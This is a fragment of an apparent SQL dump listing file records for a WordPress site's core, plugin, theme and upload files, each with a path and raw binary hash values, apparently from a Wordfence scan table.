('f�SK�o��k�����T','wp-content/plugins/wordpress-seo/images/text_link_counter.png','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/images/text_link_counter.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���d����(���','6���[gnS��ܷ۳�����n�;&O','',0,'?'),
('f���a��&�>]','wp-content/plugins/elementor-pro/assets/css/widget-motion-fx.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/css/widget-motion-fx.min.css',0,'�9��|8~��eK�=C','�9��|8~��eK�=C','Yb�7\'�o�-�ҥ���s�����/��','',0,'?'),
('f�u5�}0�l��8g��','wp-content/plugins/elementor-pro/modules/theme-builder/widgets/archive-posts.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/theme-builder/widgets/archive-posts.php',0,'��ʺ\n՝YCQ�\0�%�','��ʺ\n՝YCQ�\0�%�','�m{���GR�H����,��u��I����PI','',0,'?'),
('f���\Z����m�','wp-content/plugins/elementor/assets/css/templates/widget-progress.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/css/templates/widget-progress.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,e��\\#)�����','o�N;�ܺ���{y��HQ�\"�Yћ�\0TB','',0,'?'),
('f����e��R�)�','wp-includes/SimplePie/Item.php','/var/www/html/ictbank/blog/wp-includes/SimplePie/Item.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xi�q�l�U�G�Ց','�g��P�L/�(O��)�G�.��G����n��E','',0,'?'),
('f�3��Y����T','wp-includes/js/jquery/ui/tabs.js','/var/www/html/ictbank/blog/wp-includes/js/jquery/ui/tabs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�/��K�J�S_�ʸ�','��Y�t�Y��3�������5v��ld�\n�zQ�','',0,'?'),
('f�������E䣄','wp-content/plugins/elementor/core/files/css/post-local-cache.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/files/css/post-local-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:uҊ/���&�uRw','&�D�v��(��[L%��`�%�.�����R','',0,'?'),
('fֈ�����V�Թ)�9','wp-includes/theme-compat/embed-content.php','/var/www/html/ictbank/blog/wp-includes/theme-compat/embed-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��me���8�����','}Ec���z�]#�n���w?y��R�a��0ޅ6','',0,'?'),
('f����$�[7|J�','wp-content/plugins/elementor-pro/modules/popup/assets/images/triggers/exit_intent.svg','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/popup/assets/images/triggers/exit_intent.svg',0,'��h�%�H�7�!/W','��h�%�H�7�!/W','8�� ����s�P�&m����9�U ��v*','',0,'?'),
('fߨ+Ĕ�\0E��.pݔ�','wp-content/plugins/elementor-pro/modules/woocommerce/widgets/product-meta.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/woocommerce/widgets/product-meta.php',0,'�6�UYi�<r���','�6�UYi�<r���','Џ�~0�@�^7R����NB�J��N/|m~K�qi�','',0,'?'),
('f�&�\"��=�Z$','wp-content/plugins/elementor/assets/js/admin.min.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/admin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5_���,�4��b��.j\'',' B?_�����c:6�h��L\"���e�>���\")]=','',0,'?'),
('g#L�ͬK�A]ea�2','wp-content/plugins/wordpress-seo/vendor/composer/autoload_namespaces.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�,}vĨ3��G��)�','E�r4@\0�ԡ$��z�3�$l��\Z�`i�ex�l�','',0,'?'),
('g#�,vM������:��','wp-includes/js/jquery/jquery.js','/var/www/html/ictbank/blog/wp-includes/js/jquery/jquery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b>�|�� <2\\Q\Zs�','�k�+���/fg�ƃL@��cf9�sJ�tX/nn','',0,'?'),
('g\'@�̄�¿�����','wp-content/plugins/wordpress-seo/css/dist/modal-2320.css','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/css/dist/modal-2320.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a��Gh��;�eSɮ','ΐ%:|��a)Αo���;G>�CG���ȻU�','',0,'?'),
('g)��NpJ@o{�Ӱ��','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/http-client/src/ClientInterface.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor_prefixed/psr/http-client/src/ClientInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;{�R���X���','���@��Sz��~��#��3����DmW�eN% �','',0,'?'),
('g+yr���q����D��/','wp-includes/vars.php','/var/www/html/ictbank/blog/wp-includes/vars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c���(���\"��R','��ا`3���4%ڻc$\"� `���2�ً5','',0,'?'),
('g+���wJoG���{b','wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js','/var/www/html/ictbank/blog/wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�4�\0��ޮ�颺�','�Y����V��[��6#�\\���^uC�2�f�','',0,'?'),
('gQir��똿��/!��','wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php','/var/www/html/ictbank/blog/wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���@�ϳ��;�$�s','�@�`�W�*֔���~./\Z Y�W@�$�\\��М','',0,'?'),
('gYBJ>�3ʙD�Z��','wp-content/plugins/elementor-pro/modules/posts/traits/button-widget-trait.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/posts/traits/button-widget-trait.php',0,'��0��;���Hٺ��','��0��;���Hٺ��','��ɸc9n��_�n���G|/���sV[\Z�','',0,'?'),
('gu���6�]݂�?���','wp-content/plugins/elementor-pro/modules/forms/classes/form-record.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/forms/classes/form-record.php',0,'#�,0�Ya�����','#�,0�Ya�����','�0�ߖ9��[Ak�xWe��>BPxVҍZ鶬�','',0,'?'),
('gv��\ZUO��������','wp-includes/blocks/html/editor.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/html/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fX=��\"~j���{�','Zc���cp�i4�g!m�BC�K:d)&��/(B','',0,'?'),
('gw9+ӱW/qn��[�','wp-content/plugins/syntaxhighlighter/third-party-brushes/shBrushFSharp.js','/var/www/html/ictbank/blog/wp-content/plugins/syntaxhighlighter/third-party-brushes/shBrushFSharp.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n��d�\nӹ�QA','1��f�������ƅ��O�q!�Q�O��܄','',0,'?'),
('gxF6�U�?g���þ�','wp-content/plugins/elementor/includes/controls/animation.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/includes/controls/animation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^���mob����{','�Mֽ:\r/�x.QN���P��t�[:L�����','',0,'?'),
('g{�b��q���w�','wp-content/plugins/elementor/includes/widgets/menu-anchor.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/includes/widgets/menu-anchor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ɴ�=�r[�Im;Ț҆','�W��X�|N����Đ�mrJP\\�ZDE�=','',0,'?'),
('g|y_�o4\"��X�N���','wp-includes/images/smilies/mrgreen.png','/var/www/html/ictbank/blog/wp-includes/images/smilies/mrgreen.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-5��^����J�j���','���M��g�$��+;��\0�5����H&\\E6%w','',0,'?'),
('g~��e�-�W�c��\\�','wp-content/plugins/elementor-pro/assets/js/60745ddf42fde6647dbc.bundle.min.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/js/60745ddf42fde6647dbc.bundle.min.js',0,'�6�wI�5|��M��n\"','�6�wI�5|��M��n\"','v�R�M0+V�묮*���kB��3���K��','',0,'?'),
('g�\Z���Ş��|q�(','wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php','/var/www/html/ictbank/blog/wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�W�M��&�8�3�6','TR@pe��S`F�aױC�>+�V�%�8�JyQ','',0,'?'),
('g�$G\\��;�r���1X','wp-includes/images/wpicons.png','/var/www/html/ictbank/blog/wp-includes/images/wpicons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dS��uq��V_���a�','���cZ_��?n�_��K��6��1�\\}r','',0,'?'),
('g�K����N>J��4','wp-includes/blocks/freeform/editor-rtl.css','/var/www/html/ictbank/blog/wp-includes/blocks/freeform/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�ZH�ӔC��W>','Q�t��u>Y-D�ӿ�]h��moh�����#�','',0,'?'),
('g�f�1�۶�y�;�_','wp-includes/class-wp-http-proxy.php','/var/www/html/ictbank/blog/wp-includes/class-wp-http-proxy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}4TޗU��|��',']#�j��+x�wę�η:��b�\n�t�c�','',0,'?'),
('g��}6P�.����t�+�','wp-content/plugins/syntaxhighlighter/third-party-brushes/shBrushObjC.js','/var/www/html/ictbank/blog/wp-content/plugins/syntaxhighlighter/third-party-brushes/shBrushObjC.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kJXϞ�·�h���\0)','_�\r���{����wL �N�hMb�B� |�a','',0,'?'),
('g�s��)��m��%','wp-content/plugins/wordfence/views/waf/options-group-whitelisted.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/views/waf/options-group-whitelisted.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`r�ll�3@ޠ!s','F+�RZς�eQ$ep�G%Ev�-�xE','',0,'?'),
('g�]e��!^��(PK���','wp-content/plugins/wordfence/models/common/wfTab.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/models/common/wfTab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�T�}�HW\'<}\\','Z¥|�s�S�8e��3�Eؗ�$����ܜ-h�','',0,'?'),
('g��~)�~�s�ʞ��I','wp-admin/includes/class-language-pack-upgrader.php','/var/www/html/ictbank/blog/wp-admin/includes/class-language-pack-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h֘˷!Ć7+b���','����F\\V/�;�\\�ҲG���ߪ�\0>���','',0,'?'),
('g�3\"���8�9�2:3?E','wp-content/plugins/wordpress-seo/src/analytics/application/missing-indexables-collector.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/analytics/application/missing-indexables-collector.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1n�J�*$\0E\r��','F\'E0>�߶��Z���4�r���Z�7���8�','',0,'?'),
('gӁ�\"}�H��,�d�','wp-includes/blocks/social-links/style.css','/var/www/html/ictbank/blog/wp-includes/blocks/social-links/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K_\06]N������','+��K��)܆u���|�3�3�\'~��G�P�6','',0,'?'),
('g�_������V8��]','wp-content/plugins/elementor/modules/container-converter/module.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/container-converter/module.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gM�C�f�a(��rZl','b��ҕc���:*��Ŝ��S�0~4���td','',0,'?'),
('g��]bR%� Z��E�','wp-includes/js/shortcode.min.js','/var/www/html/ictbank/blog/wp-includes/js/shortcode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>}OP�8Z,Ob���>','�����:���D�a�!�ق�v����2\"!','',0,'?'),
('g�+�_�P=�y�P�#','wp-content/plugins/wordpress-seo/js/dist/externals/styleGuide.js','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/js/dist/externals/styleGuide.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�kO\'�2S*h��;[�\\','!�^eL��s�R͈H&��7�B�����DHQ�','',0,'?'),
('g�Ed��1��D}����','wp-includes/js/jquery/ui/autocomplete.min.js','/var/www/html/ictbank/blog/wp-includes/js/jquery/ui/autocomplete.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jS�4[7�\"b�qhNy','$E]T��B[Uq��ղcα��6��ڟ�0��','',0,'?'),
('hi�FǷɵx��N�','wp-content/plugins/wordpress-seo/inc/language-utils.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/inc/language-utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4y�J��`{��Z�YPz','H�\Z�;��N<�yzg�[H �مm6vo����','',0,'?'),
('h塸 �Ҳf���','wp-content/plugins/elementor/assets/images/app/onboarding/Library.svg','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/images/app/onboarding/Library.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{��B�T�wQ��','gĬ�\0*�<O|�5��Sj=�%���-�$','',0,'?'),
('hO��C:��&�wc','wp-content/plugins/elementor-pro/assets/js/notes/notes-app-initiator.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/js/notes/notes-app-initiator.js',0,'��mR� �V�����','��mR� �V�����','eKxܨimr<�k�ţ�~\0�K���#;=e','',0,'?'),
('hr��/�YFLe�','wp-content/plugins/syntaxhighlighter/syntaxhighlighter2/scripts/shBrushPhp.js','/var/www/html/ictbank/blog/wp-content/plugins/syntaxhighlighter/syntaxhighlighter2/scripts/shBrushPhp.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nsh�\r��{v�\\�#U','�\n{�}�\n�JB7��� ��E�a��l|�ad','',0,'?'),
('hZ[���=���w�r�','wp-includes/sodium_compat/src/Core32/XSalsa20.php','/var/www/html/ictbank/blog/wp-includes/sodium_compat/src/Core32/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\������:R/�+','�ɫ�������:���jN�mm����R���[','',0,'?'),
('h\ZOhl��_��Lm/�','wp-includes/class-wp-customize-manager.php','/var/www/html/ictbank/blog/wp-includes/class-wp-customize-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')E��*?�� �,�','2�w�f���LY�20j�+0�W��,!1O9D�','',0,'?'),
('h d��껅2��_�r','wp-includes/functions.wp-styles.php','/var/www/html/ictbank/blog/wp-includes/functions.wp-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[[V��-��x�o��','6�Th�@���J�[��Nnl�O�[��6*��6��','',0,'?'),
('h0X-�i����^�G`8','wp-includes/pluggable.php','/var/www/html/ictbank/blog/wp-includes/pluggable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}bT5dѷ�vWyyI*O�','���y\0�5�\\Z߬��X ��/l���1؛VF�','',0,'?'),
('h4���#3�`�-݈�\"�','wp-admin/profile.php','/var/www/html/ictbank/blog/wp-admin/profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0��,���g;ꙴ','�C��q��N,�`v�S��*���Z[�`���m�','',0,'?'),
('h@Z�%�R�F�;ti\\m','wp-admin/css/login-rtl.min.css','/var/www/html/ictbank/blog/wp-admin/css/login-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(ZrZ��@\"�.�M','��m�����m�9����&�E+��h�','',0,'?'),
('h\\{���t��O<p&�AE','wp-content/plugins/wordpress-seo/vendor/yoast/whip/src/Messages/HostMessage.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor/yoast/whip/src/Messages/HostMessage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-^�u��r0$� ��L','T�g�W��M�.7��m+����O�8�','',0,'?'),
('hc���=� ���0�','wp-includes/block-patterns/social-links-shared-background-color.php','/var/www/html/ictbank/blog/wp-includes/block-patterns/social-links-shared-background-color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����}��;`\Z�Դ��','>�**��?�-T*��H�%9�/��E�Vy�f�','',0,'?'),
('hzV����z$=���','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/RedirectMiddleware.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/RedirectMiddleware.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8d�\0��b�^G��','0�g���(�w�~�8`ʔ~c���C�K��!�','',0,'?'),
('h|hE��f:Ʊ2��~','wp-admin/network/theme-install.php','/var/www/html/ictbank/blog/wp-admin/network/theme-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','堷ȹ����H^r�','�f�kL��\Z�)h/F_��M�9�j���V�','',0,'?'),
('h��.��b\"l�^Sj','wp-content/plugins/wordpress-seo/images/academy/all_around_seo.png','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/images/academy/all_around_seo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�&�����l�P��','�,b�@ 9qPl�.d�\rN�Tvx|@��瘚G','',0,'?'),
('h�OT,$��(�������','wp-includes/blocks/site-title/block.json','/var/www/html/ictbank/blog/wp-includes/blocks/site-title/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݒ��9f \0�,C�','��|4�G��ꇎ��ACK��́E0q�\"�','',0,'?'),
('h��c!\\d/� \0L]sD','wp-includes/assets/script-loader-react-refresh-runtime.php','/var/www/html/ictbank/blog/wp-includes/assets/script-loader-react-refresh-runtime.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0�!�j1M/>��?','�V<���#Y�&=�z;���I�0����Nlz','',0,'?'),
('h��~cTOo�y4|','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php','/var/www/html/ictbank/blog/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f\"����#6${ JL\'\"','�eŇ�6\Z(�q�&�ڶ���]���\n�Cli�ީ�','',0,'?'),
('h�M�V�m� ����','wp-includes/blocks/categories/style-rtl.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/categories/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������~�B[|�l','�\'��Y�9� �9��_���\0& ���','',0,'?'),
('h�<�]���OpNCƴ�','wp-content/plugins/wordfence/lib/wordfenceURLHoover.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/lib/wordfenceURLHoover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���@���� ʰ�8: �','K�K�MJ��i���ٍTQ.�9�2=���w1�|�','',0,'?'),
('h���K���%���H;NC','wp-content/plugins/wordpress-seo/src/exceptions/indexable/author-not-built-exception.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/exceptions/indexable/author-not-built-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[z�Z\'�_A����^X�','�dN�*�m$1^�\\@�����S�pe�','',0,'?'),
('hƷ-BH����$ �a','wp-content/plugins/elementor-pro/assets/lib/dom-to-image/js/dom-to-image.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/lib/dom-to-image/js/dom-to-image.js',0,'��c2@d�9��nŢ��','��c2@d�9��nŢ��','�=:|���V\r���������sG�tG�','',0,'?'),
('h����/7���@X1','wp-content/uploads/2020/02/cropped-ictbank.png','/var/www/html/ictbank/blog/wp-content/uploads/2020/02/cropped-ictbank.png',0,'}��a�$/ �:��>V','}��a�$/ �:��>V','/W����ĩ��V�t�5L3!6�8�+�u','',0,'?'),
('h�\0���*�j����A�','wp-content/plugins/elementor-pro/assets/css/widget-gallery.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/css/widget-gallery.min.css',0,'����Fo|ˎҜ^��','����Fo|ˎҜ^��','�Q��a��q`(�ꛨ�Ȋ_L�P�n�N]��','',0,'?'),
('h� 4��rL�^�?��','wp-content/plugins/elementor/assets/js/5975ee58d21883e10a11.bundle.min.js.LICENSE.txt','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/5975ee58d21883e10a11.bundle.min.js.LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'�+�˩���MS���','5t�NH�₇lQ��bU5�\"@(�%q2u��','',0,'?'),
('h�<f�#�n(8','wp-content/themes/twentytwentyfour/templates/home.html','/var/www/html/ictbank/blog/wp-content/themes/twentytwentyfour/templates/home.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D(�`\\�>1H]i �','V�|�ђ�?�)��zR��A�g�aష��','',0,'?'),
('h�秉@�W��\'D�/','wp-content/plugins/elementor/app/modules/import-export/runners/import/plugins.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/app/modules/import-export/runners/import/plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�l\"�g��b�����','^]�\n6J�>K�>�g�dn���vњ#�Ϣ','',0,'?'),
('h���QK�V<r:Mg_��','wp-includes/js/dist/format-library.js','/var/www/html/ictbank/blog/wp-includes/js/dist/format-library.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_:<�KL�$�7��H','��F�h�ݙŔC��d^3����n~��M`:�','',0,'?'),
('h�s�q�&�;3 �<�','wp-content/plugins/wordpress-seo/src/introductions/application/introductions-collector.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/introductions/application/introductions-collector.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����g���k�^�','��KH��\\�֛w�8E{���ʹ���M�b�','',0,'?'),
('i����kmCx�ʷ��','wp-content/plugins/wordfence/lib/wfDashboard.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/lib/wfDashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I��A�-���&R�','�S\0H���\n#8�yܵ\n�;¸@�.�=�!�B�','',0,'?'),
('i6oV�5��1�,n�','wp-content/plugins/wordpress-seo/src/config/migrations/20200429105310_TruncateIndexableTables.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/config/migrations/20200429105310_TruncateIndexableTables.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�e�Bg|)\\���`LE','J @�6�LoU�=����-�`�����cC�','',0,'?'),
('i��{��pW\r��9�/�','wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-settings-data.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-settings-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����>lQnu���','+��#2�F�W��E2�Ϸ��G���y`��9��+','',0,'?'),
('iHGY҄M����z�','wp-content/plugins/elementor-pro/core/app/modules/site-editor/assets/js/pages/templates.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/core/app/modules/site-editor/assets/js/pages/templates.js',0,'O4fXBf 0�C���W','O4fXBf 0�C���W','��rDd��o��2X��J��d��\Zr��N�,�Y�','',0,'?'),
('i��;�&��o�?','wp-includes/IXR/class-IXR-base64.php','/var/www/html/ictbank/blog/wp-includes/IXR/class-IXR-base64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*6���D�T�e��','?F]L�2}���\rS�@b�2�O�o�uU\'O��','',0,'?'),
('i(�� �0t7�@�Q�@','wp-content/plugins/wordpress-seo/inc/exceptions/class-myyoast-bad-request-exception.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/inc/exceptions/class-myyoast-bad-request-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$v�)W���ؔ�E��','X���_<X�Knm�_���&��K$E3S�','',0,'?'),
('i3�|� JP���*�','wp-content/plugins/wordpress-seo/src/conditionals/development-conditional.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/conditionals/development-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɋ3 3�G�.�7��1','y6U������t�ĒfDk�w�+т_G�naB','',0,'?'),
('i?��+G�J�J9�-K�V','wp-content/plugins/elementor-pro/modules/assets-manager/asset-types/icons/icon-sets/fontello.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/assets-manager/asset-types/icons/icon-sets/fontello.php',0,'���h$�2�%���W','���h$�2�%���W','��@�.���i�<D�X̦G`�!Ms�oWxԣ�','',0,'?'),
('ia{�-��\Z�ؙo��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/SipHash.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�<���s��9','��Q�\'�r�� �t7��=s*a`<�z�o�_','',0,'?'),
('ic{0���h8N�G��','wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H�A`�Y��劃r�','虁�D���{�}��9�Zi��~��}~%7�B�)','',0,'?'),
('idܶ�1�\"���^�','wp-includes/blocks/separator/style.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/separator/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E`f�ʐE���','�\n�~ڹ�`7���|p���P�*�6�p��.','',0,'?'),
('iiO�s�`�m0<,�;','wp-content/plugins/elementor-pro/modules/table-of-contents/widgets/table-of-contents.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/table-of-contents/widgets/table-of-contents.php',0,'��hl�yƜk ;sg��','��hl�yƜk ;sg��','>�뵞gF�L;�� ����>��39^n+*u��(','',0,'?'),
('ii�\"o�C����`','wp-includes/sodium_compat/src/Core/HChaCha20.php','/var/www/html/ictbank/blog/wp-includes/sodium_compat/src/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[Rz@�MMQmr���','�q���X9O���a4�A�����\'���̾e','',0,'?'),
('i�?o���\rW�+$J\n ','wp-content/plugins/wordfence/modules/login-security/css/font-awesome.1722265817.css','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/modules/login-security/css/font-awesome.1722265817.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��2J娳�YB瘱�','\ZP�L㨒���Zi�t�A�������7d�','',0,'?'),
('i�G0_W3b�mex��','wp-content/plugins/elementor/assets/images/app/site-editor/header.svg','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/images/app/site-editor/header.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gA�\"�a.3m;s3�','�WD�֘\0�9J�\"P�`���(���v)�','',0,'?'),
('i�;+����O�s�ֿ','wp-content/plugins/wordpress-seo/src/conditionals/import-tool-selected-conditional.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/conditionals/import-tool-selected-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_I�&(�iW�[�0��|','/\Z�4���+٭����\"�~�#q�3U�ԗ{�\'�','',0,'?'),
('i�-��X�8V[~E�','wp-admin/css/install-rtl.min.css','/var/www/html/ictbank/blog/wp-admin/css/install-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@;e�����\n]','�y�( 8�Hᩮk��� =BRN�~��b�','',0,'?'),
('i��CC�,�+����','wp-content/plugins/wordfence/lib/wfWebsite.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/lib/wfWebsite.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���t�~�AJ�ao�','�A��lE��T2 :�$����&b��','',0,'?'),
('i�\\����=X�h$','wp-admin/js/language-chooser.js','/var/www/html/ictbank/blog/wp-admin/js/language-chooser.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӥ�ku��lLS�','��r4��i���j�\"܈�����6���&','',0,'?'),
('i�Ƒ��R�� (�','wp-content/uploads/2021/05/Slide02-1024x720.jpg','/var/www/html/ictbank/blog/wp-content/uploads/2021/05/Slide02-1024x720.jpg',0,'��o��![l�\n��?2','��o��![l�\n��?2','9��I���`Xܛ����䓡�\\\07�\"Q/��|','',0,'?'),
('i�63����C|w�t��','wp-content/plugins/wordpress-seo/images/rest_api.png','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/images/rest_api.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�s��r�[\\�','YC.;Pa����J�}����x����c�C�A','',0,'?'),
